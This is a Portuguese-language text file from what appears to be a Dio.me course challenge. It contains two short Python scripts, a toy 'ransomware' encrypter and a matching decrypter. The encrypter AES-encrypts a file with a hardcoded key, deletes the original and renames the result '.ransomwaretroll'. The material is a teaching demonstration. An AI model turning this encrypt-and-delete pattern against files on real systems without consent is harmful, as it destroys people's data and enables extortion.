Arquivo utilizado para encriptação e decriptação para teste
no desafio da Dio.me



Será utilizado o encrypter.py para encriptar este documento
Será utilizado também o decrypter.py para que retornemos o arquivo para a versão legível sem criptografia.


Comandos utilizados no ENCRYPTER.PY

___________________________________________________
import os
import pyaes

## abrir o arquivo a ser criptografado
file_name = "arquivo.txt"
file = open(file_name, "rb")
file_data = file.read()
file.close()

## remover o arquivo
os.remove(file_name)

## chave de criptografia
key = b"testeransomwares"
aes = pyaes.AESModeOfOperationCTR(key)

## criptografar o arquivo
crypto_data = aes.encrypt(file_data)

## salvar o arquivo criptografado
new_file = file_name + ".ransomwaretroll"
new_file = open(f'{new_file}','wb')
new_file.write(crypto_data)
new_file.close()
____________________________________________________




comandos utilizados no DECRYPTER.PY

____________________________________________________
import os
import pyaes

## abrir o arquivo criptografado
file_name = "arquivo.txt.ransomwaretroll"
file = open(file_name, "rb")
file_data = file.read()
file.close()

## chave para descriptografia
key = b"testeransomwares"
aes = pyaes.AESModeOfOperationCTR(key)
decrypt_data = aes.decrypt(file_data)

## remover o arquivo criptografado
os.remove(file_name)

## criar o arquivo descriptografado
new_file = "arquivo.txt"
new_file = open(f'{new_file}', "wb")
new_file.write(decrypt_data)
new_file.close()
___________________________________________________

